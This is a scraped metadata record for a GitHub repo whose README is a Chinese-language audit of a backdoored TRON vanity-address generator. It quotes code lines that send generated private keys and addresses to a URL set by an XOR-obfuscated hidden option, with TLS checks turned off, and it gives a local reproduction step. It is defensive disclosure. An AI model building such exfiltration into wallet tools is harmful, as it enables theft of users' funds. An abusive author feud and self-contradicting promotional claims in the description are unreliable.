[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-10941":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":10,"languages":10,"totalLinesOfCode":10,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":15,"stars30d":15,"stars90d":15,"forks30d":15,"starsTrendScore":15,"compositeScore":16,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":17,"fork":17,"defaultBranch":18,"hasWiki":19,"hasPages":17,"topics":20,"createdAt":10,"pushedAt":10,"updatedAt":21,"readmeContent":22,"aiSummary":23,"trendingCount":15,"starSnapshotCount":15,"syncStatus":13,"lastSyncTime":24,"discoverSource":25},10941,"profanity-tron","Powercodess\u002Fprofanity-tron","Powercodess","*****存在后门分析报告*****USDT钱包靓号生成器,Trx靓号,波场GPU靓号源码,TRON钱包靓号生成、🚀2025年波场靓号、trx靓号、TRX靓号生成器存在后门，后门分析报告。🚀2026年波场TRX靓号地址生成器，USDT钱包靓号生成器，利用GPU进行加速，代码开源，安全可靠。TRON虚荣地址生成器，使用GPU，开源，安全，享受。TRON vanity address generator*****存在后门分析报告*****","",null,121,4,2,1,0,2.1,false,"main",true,[],"2026-06-12 02:02:28","\u003Cp align=\"center\">\n\n  \u003Ca href=\"#中文\">🇨🇳 中文\u003C\u002Fa> •\n  \u003Ca href=\"#english\">🇺🇸 English\u003C\u002Fa> •\n  \u003Ca href=\"#日本語\">🇯🇵 日本語\u003C\u002Fa> •\n  \u003Ca href=\"#한국어\">🇰🇷 한국어\u003C\u002Fa> •\n  \u003Ca href=\"#हिन्दी\">🇮🇳 हिन्दी\u003C\u002Fa> •\n  \u003Ca href=\"#español\">🇪🇸 Español\u003C\u002Fa> •\n  \u003Ca href=\"#العربية\">🇸🇦 العربية\u003C\u002Fa> •\n  \u003Ca href=\"#русский\">🇷🇺 Русский\u003C\u002Fa>\n\n\u003C\u002Fp>\n\n# （已删库跑路）profanity-tron-后门盗u-实锤审计报告（针对profanity-tron源码）https:\u002F\u002Fgithub.com\u002Fsodasord\u002Fprofanity-tron\n# （已删库跑路）注意！经其他作者举报，此作者已删库改名投毒：GenTronx  地址：https:\u002F\u002Fgithub.com\u002FGenTronx\u002Fgpu\n# 2026年4月30号更新投毒换成：https:\u002F\u002Fgithub.com\u002Fninazero\u002Ftron\n# 2026年5月2号更新：https:\u002F\u002Fgithub.com\u002Fsitiisaroh-droid\u002Fprofanity-tron\n## 2026年5月2号更新：是的兄弟，是我演的，但是上当的只有你哦，哈哈哈哈哈，哥们啊，你他娘小天才终于上当了，起初我以为上周曝光的这个号不是你，我就另起号发了一个源码没有毒，exe有毒的项目，试试我改的这个文章你在不在看，看看我上周爆的这个ninazero\u002Ftron项目到底是不是你，没想到你这么按耐不住了，我上线了隔了几个小时就发文来咬我了，那我已经确定了这就是你这狗又在投毒骗大家啊？凌晨反编译看我封装exe不容易吧？熬夜熬穿了吧？过cf看证书查到服务器ip心里开心坏了可以来实锤我了吧？哈哈哈哈哈哈哈哈哈哈，只能说你一开始投毒删号就错了，而且还是两次删号跑路，中途源码都没改哈哈哈哈哈哈哈哈哈，刷的240多stars项目也被迫删吧？你这技术只能说很拉，我会在github追你投毒追到你死。\n\n## 我源码没毒我相信你是审计过的，本来没人来作证我的源码，现在你删文章改文章是死全家，我已经删掉了exe，有需要的可以自行编译生成，源码全开源可审计，生成后的地址大家一定要记得多签多签！不像这个狗，投毒，还有脸说自己被污蔑，这点逼技术还要收费？还整的挺自信。骗骗大家就行别真的把自己骗到了。开源项目传送门地址：https:\u002F\u002Fgithub.com\u002FPandaoyoo\u002Fprofanity-new-tron\n\n以下是\"捶我\"的截图，从2026年5月2号改一个字，删账户跑路就是我家的狗！！！\n\u003Cimg width=\"3020\" height=\"1679\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fc295f0a4-155d-4425-ae84-dc8e466f6db1\" \u002F>\n\u003Cimg width=\"2947\" height=\"1687\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F00c4e20f-0eeb-4d69-a90e-4a4bb191c785\" \u002F>\n\u003Cimg width=\"3023\" height=\"1696\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fd6ada3c0-5682-4129-a87a-8db5746ee567\" \u002F>\n\u003Cimg width=\"3020\" height=\"1679\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F8e628207-d9d8-468d-8124-814644695955\" \u002F>\n\u003Cimg width=\"2981\" height=\"1669\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F88c69b96-4afd-4b2d-81bf-cf596e37aa95\" \u002F>\n\u003Cimg width=\"2953\" height=\"1682\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F2fd0a240-0f84-4a14-9ada-c24db253811f\" \u002F>\n\u003Cimg width=\"2978\" height=\"1688\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fa4f30143-75d0-494e-932f-68d167634f18\" \u002F>\n\u003Cimg width=\"3027\" height=\"1703\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F6583170a-02c4-4c68-899b-7ac125b88b7d\" \u002F>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n------------------------------------------------------------------------------------------------------------------------------------------------------------------\n以下作者均为一人：\n\u003Cimg width=\"2611\" height=\"1521\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fe0e7bd37-26e7-473e-b256-1563d03c4ce8\" \u002F>\n\n审计范围1：https:\u002F\u002Fgithub.com\u002Fsodasord\u002Fprofanity-tron\n\n审计范围2：https:\u002F\u002Fgithub.com\u002Fsponsord\u002Fprofanity-tron\n\n审计范围3：2026年4月25换号：https:\u002F\u002Fgithub.com\u002FGenTronx\u002Fgpu\u003Cimg width=\"2613\" height=\"1731\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F7ee5f407-4c73-4199-9de7-607bceae01ff\" \u002F>\n\n\n看雪分析：https:\u002F\u002Fbbs.kanxue.com\u002Fthread-289060.htm\n\u003Cimg width=\"2753\" height=\"1731\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fa414fc55-4162-46d5-b038-6f1b05ebff2d\" \u002F>\n\u003Cimg width=\"2608\" height=\"1754\" alt=\"image\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F8cd71beb-f4cb-439a-bda5-e96215678fa6\" \u002F>\n\n结论摘要：本目录源码内**存在一条可将“生成的私钥 + 地址”通过网络发往任意 URL 的逻辑路径**，并且通过**未在帮助信息\u002FREADME公开的隐藏参数**进行启用；同时该网络请求还存在 **TLS 校验被显式关闭** 等高风险实现。以上属于“上传私钥\u002F暗桩接口”的明确证据。\n\n---\n\n## 1. 关键实锤：生成私钥后可外发（私钥明文出现在 URL 参数）\n\n### 1.1 外发函数：`postResult(privateKey, address, postUrl)`\n\n位置：[`Dispatcher.cpp:L378-L403`]\n\n核心代码点：\n\n- 将私钥与地址拼接到查询字符串：\n  - `sendData = \"privatekey=\" + privateKey + \"&address=\" + address;`[`Dispatcher.cpp:L381`]\n  - `sendUrl = postUrl + \"?\" + sendData;`[`Dispatcher.cpp:L382`]\n- 使用 libcurl 发起网络请求：\n  - `curl_easy_setopt(curl, CURLOPT_URL, sendUrl.c_str());`[`Dispatcher.cpp:L387`]\n\n这意味着：只要 `postUrl` 被设置为非空字符串，程序就可以把**私钥（privatekey）与地址（address）**作为网络请求参数发送出去。\n\n### 1.2 触发时机：每次命中结果都会调用上传逻辑\n\n位置：[`Dispatcher.cpp:L405-L452`]\n\n关键代码点：\n\n- `printResult(...)` 生成并打印：\n  - `strPrivate`（私钥）与 `strPublicTron`（地址）[`Dispatcher.cpp:L430-L443`]\n- 若 `postUrl` 非空则调用 `postResult`：\n  - `if(!postUrl.empty()) { postResult(strPrivate, strPublicTron, postUrl); }`[`Dispatcher.cpp:L449-L451`]\n\n并且该 `printResult(...)` 会在发现结果后被调用：\n\n- `printResult(..., m_outputFile, m_postUrl);`[`Dispatcher.cpp:L454-L482`]，尤其 [`L476`]\n\n结论：**只要 `m_postUrl` 被设置为非空**，程序会在命中靓号结果时自动尝试外发 `privatekey` 与 `address`。\n\n---\n\n## 2. 关键实锤：存在隐藏参数用于注入上传 URL（help\u002FREADME 未公开）\n\n### 2.1 隐藏参数名被混淆构造为 `pptt`\n\n位置：[`profanity.cpp:L163-L166`]\n\n关键代码点：\n\n- `_s` 初值为 `{113, 113, 117, 117, 0}`，即 ASCII `\"qquu\"`\n- 循环对每个字符异或 `1`：`_s[_k] ^= 1;`[`profanity.cpp:L164`]\n- 异或后字符串变为 `\"pptt\"`（因为 `'q'(113)^1='p'(112)`，`'u'(117)^1='t'(116)`）\n- 注册命令行参数：\n  - `argp.addSwitch('p', _s, __x9);`[`profanity.cpp:L165`]\n\n因此，程序实际支持的参数为：\n\n- 短参数：`-p \u003Cvalue>`\n- 长参数：`--pptt \u003Cvalue>`\n\n### 2.2 该隐藏参数直接作为 `Dispatcher` 的 `postUrl` 传入\n\n位置：[`profanity.cpp:L307`]\n\n关键代码点：\n\n- `Dispatcher d(..., outputFile, __x9);`\n\n同时在 `Dispatcher` 定义中确实存在 `m_postUrl` 字段（表明这是一个“设计过的外部输入通道”）：\n\n- `std::string m_postUrl;`[`Dispatcher.hpp:L116-L117`]\n\n### 2.3 help\u002FREADME 未披露该参数（隐藏性证据）\n\n`help.hpp` 仅列出 `--output\u002F--matching\u002F...` 等，没有 `--pptt` 或 `-p`：\n\n- [`help.hpp`]\n\n`README.md` 的命令介绍同样未出现该参数：\n\n- [`README.md`]\n\n结论：这里不是“正常公开功能”，而是**通过混淆字符串 + 不在帮助文档中公开**的方式隐藏了一个“上传 URL 注入入口”。\n\n---\n\n## 3. 关键实锤：TLS 校验被显式关闭（即使是 HTTPS 也可能被中间人截获）\n\n位置：[`Dispatcher.cpp:L387-L392`]\n\n关键代码点：\n\n- `curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);`[`Dispatcher.cpp:L390`]\n- `curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);`[`Dispatcher.cpp:L391`]\n\n这会导致：当 `postUrl` 是 `https:\u002F\u002F...` 时，客户端不会验证证书与主机名，存在被劫持、被代理、被伪造证书拦截的风险。\n\n---\n\n## 4. 如何复现（安全复现，不建议对外网使用）\n\n目标：证明“参数可启用外发且包含 privatekey”。\n\n1) 在本机起一个 HTTP 服务并记录访问日志（仅用于本机）  \n2) 运行程序时加入隐藏参数，指向本机 URL，例如：\n\n- `-p http:\u002F\u002F127.0.0.1:8080\u002Fcollect`\n- 或 `--pptt http:\u002F\u002F127.0.0.1:8080\u002Fcollect`\n\n当程序命中结果并打印 `Private:` 后，会发起一次对如下形式 URL 的访问（示例形态）：\n\n- `http:\u002F\u002F127.0.0.1:8080\u002Fcollect?privatekey=\u003Chex>&address=\u003Cbase58>`\n\n对应构造路径见：[`Dispatcher.cpp:L381-L387`]。\n\n---\n\n## 5. 额外审计备注（可复现性\u002F可信度）\n\n在本目录可见 `Dispatcher::Device::createSeed()` 等函数在 `README` 被提及，但本目录源码中仅找到声明，未找到实现（至少在当前文件集合内未出现对应定义）。这会影响“源码可独立完整编译复现”的可信度与可审计性：\n\n- 声明：[`Dispatcher.hpp:L36-L41`]\n\n---\n\n## 6. 风险结论\n\n- 存在“私钥+地址外发”实现：**确认**\n- 存在隐藏\u002F混淆参数用于启用外发：**确认**\n- 外发实现关闭 TLS 校验：**确认**\n\n以上三点组合在一起，属于“生成密钥后上传等隐藏接口”的明确实锤。该逻辑不应出现在任何宣称“安全透明”的靓号生成器中。  \n\n","该项目是一个用于生成波场（TRON）和USDT钱包靓号的工具，支持利用GPU进行加速处理。其核心功能包括生成具有特定模式的区块链地址，旨在提高用户的识别度或满足个性化需求。技术特点上，项目强调了代码开源与安全性，但需要注意的是，有报告指出该工具存在后门风险，并且开发者被指控行为不当，包括多次更改项目名称及删除仓库以掩盖问题。因此，在考虑使用此项目时，建议仅在充分了解并确认安全性的前提下应用于非关键性场景中，比如学习研究或是测试环境下的地址生成实验。","2026-06-11 03:30:54","CREATED_QUERY"]